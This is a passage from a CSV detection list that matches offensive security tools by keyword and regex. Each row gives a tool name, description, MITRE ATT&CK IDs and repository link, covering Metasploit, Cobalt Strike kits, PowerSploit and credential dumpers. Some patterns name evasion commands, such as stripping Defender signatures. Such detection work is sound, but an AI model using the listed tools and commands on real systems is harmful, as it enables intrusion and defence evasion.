Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*mosquitto2john.py*",".{0,1000}mosquitto2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*MotdPersistence*",".{0,1000}MotdPersistence.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*Mount-VolumeShadowCopy*",".{0,1000}Mount\-VolumeShadowCopy.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*mousejack*",".{0,1000}mousejack.{0,1000}","offensive_tool_keyword","mousejack","MouseJack device discovery and research tools","T1179 - T1059 - T1065 - T1057","TA0011 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BastilleResearch/mousejack","1","1","N/A","10","10","1255","257","2017-12-19T10:16:25Z","2016-02-23T14:19:38Z" "*Mouselogger.ps1*",".{0,1000}Mouselogger\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*mouseshaker.*",".{0,1000}mouseshaker\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in any way.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*MoveKit-master.zip*",".{0,1000}MoveKit\-master\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","635","108","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*move-msbuild * http move.csproj*",".{0,1000}move\-msbuild\s.{0,1000}\shttp\smove\.csproj.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","635","108","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*move-pre-custom-file *.exe *",".{0,1000}move\-pre\-custom\-file\s.{0,1000}\.exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","635","108","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*movfuscator*",".{0,1000}movfuscator.{0,1000}","offensive_tool_keyword","movfuscator","The M/o/Vfuscator (short 'o. sounds like mobfuscator) compiles programs into mov instructions. and only mov instructions. Arithmetic. comparisons. jumps. function calls. and everything else a program needs are all performed through mov operations. 
there is no self-modifying code. no transport-triggered calculation. and no other form of non-mov cheating","T1057 - T1027 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/xoreaxeaxeax/movfuscator","1","0","N/A","N/A","10","9138","387","2023-03-04T21:15:10Z","2015-06-16T01:49:40Z" "*Mozilla/5.0 (*-bit) dnstwist*",".{0,1000}Mozilla\/5\.0\s\(.{0,1000}\-bit\)\sdnstwist.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "*mozilla2john.py*",".{0,1000}mozilla2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*mozlz4-win32.exe*",".{0,1000}mozlz4\-win32\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" 
"*mozlz4-win32.exe*",".{0,1000}mozlz4\-win32\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*MpCmdRun.exe -RemoveDefinitions -All*",".{0,1000}MpCmdRun\.exe\s\-RemoveDefinitions\s\-All.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*MpCmdRun.exe* -RemoveDefinitions -All*",".{0,1000}MpCmdRun\.exe.{0,1000}\s\-RemoveDefinitions\s\-All.{0,1000}","offensive_tool_keyword","MpCmdRun","Removing all the signature from windows defender - used by a metasploit module","T1562.001","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*mpgn/BackupOperatorToDA*",".{0,1000}mpgn\/BackupOperatorToDA.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","367","54","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" 
"*mqtt_check.py*",".{0,1000}mqtt_check\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*mr.un1k0d3r@gmail.com*",".{0,1000}mr\.un1k0d3r\@gmail\.com.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*Mr-B0b/SpaceRunner*",".{0,1000}Mr\-B0b\/SpaceRunner.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*Mr-Cyb3rgh0st/Excel-Exploit*",".{0,1000}Mr\-Cyb3rgh0st\/Excel\-Exploit.{0,1000}","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","20","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" "*mrd0x/BITB*",".{0,1000}mrd0x\/BITB.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2726","467","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z" "*mremoteng_decrypt.py*",".{0,1000}mremoteng_decrypt\.py.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1589 T1003 T1563 T1552 T1098 T1021","N/A","N/A","N/A","Credential Access","https://github.com/haseebT/mRemoteNG-Decrypt","1","1","N/A","N/A","2","120","43","2023-07-06T16:15:20Z","2019-05-27T05:25:57Z" "*mRemoteNG-local.py*",".{0,1000}mRemoteNG\-local\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - 
T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*MrEmpy/Reaper*",".{0,1000}MrEmpy\/Reaper.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*Mr-Un1k0d3r*",".{0,1000}Mr\-Un1k0d3r.{0,1000}","offensive_tool_keyword","Github Username","github username Mostly Red Team tools for penetration testing. Twitter - @MrUn1k0d3r","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Mr-Un1k0d3r","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Mr-Un1k0d3r/DKMC*",".{0,1000}Mr\-Un1k0d3r\/DKMC.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*ms_teams_exports_usernev_dll.txt*",".{0,1000}ms_teams_exports_usernev_dll\.txt.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "*ms04_007_killbill.*",".{0,1000}ms04_007_killbill\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ms14-068.py -u *",".{0,1000}ms14\-068\.py\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ms14-068.py -u*",".{0,1000}ms14\-068\.py\s\-u.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ms14-068_check*",".{0,1000}ms14\-068_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script 
that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*ms16_075_reflection_juicy.rb*",".{0,1000}ms16_075_reflection_juicy\.rb.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*ms17_010_eternalblue*",".{0,1000}ms17_010_eternalblue.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ms17_010_eternalblue.*",".{0,1000}ms17_010_eternalblue\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ms17_010_psexec*",".{0,1000}ms17_010_psexec.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ms17_010_psexec.*",".{0,1000}ms17_010_psexec\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*MS17-010*",".{0,1000}MS17\-010.{0,1000}","offensive_tool_keyword","POC","MS17-010 poc github repos","T1204.002","TA0002","N/A","N/A","Exploitation tools","https://github.com/worawit/MS17-010","1","0","N/A","N/A","10","2098","1102","2023-06-20T08:27:19Z","2017-06-19T16:47:31Z" "*ms17-010_check*",".{0,1000}ms17\-010_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*MSBuild.exe NetLoader.xml*",".{0,1000}MSBuild\.exe\sNetLoader\.xml.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*MSBuildShell*",".{0,1000}MSBuildShell.{0,1000}","offensive_tool_keyword","MSBuildShell","a Powershell Host running within MSBuild.exe This code lets you Bypass Application Whitelisting and Powershell.exe restrictions and gives you a shell that almost looks and feels like a normal Powershell session (Get-Credential. PSSessions -> Works. Tab Completion -> Unfortunately not). 
It will also bypass the Antimalware Scan Interface (AMSI). which provides enhanced malware protection for Powershell scripts","T1027 - T1086 - T1059 - T1064 - T1089","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/MSBuildShell","1","1","N/A","N/A","3","281","75","2019-08-02T06:46:52Z","2016-11-11T18:52:38Z" "*MScholtes/PS2EXE*",".{0,1000}MScholtes\/PS2EXE.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*msf*/logs/framework.log*",".{0,1000}msf.{0,1000}\/logs\/framework\.log.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msf_api_doc.rb*",".{0,1000}msf_api_doc\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msf_cve_extracter.py*",".{0,1000}msf_cve_extracter\.py.{0,1000}","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","494","109","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" "*msf_exec.py*",".{0,1000}msf_exec\.py.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msf_matchers*",".{0,1000}msf_matchers.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msf_payload.ps1*",".{0,1000}msf_payload\.ps1.{0,1000}","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","431","130","2023-11-30T09:24:13Z","2017-07-23T17:01:19Z" "*msf-auxiliarys*",".{0,1000}msf\-auxiliarys.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*msfcallback.bin*",".{0,1000}msfcallback\.bin.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*msfconsole *",".{0,1000}msfconsole\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*msfconsole*",".{0,1000}msfconsole.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 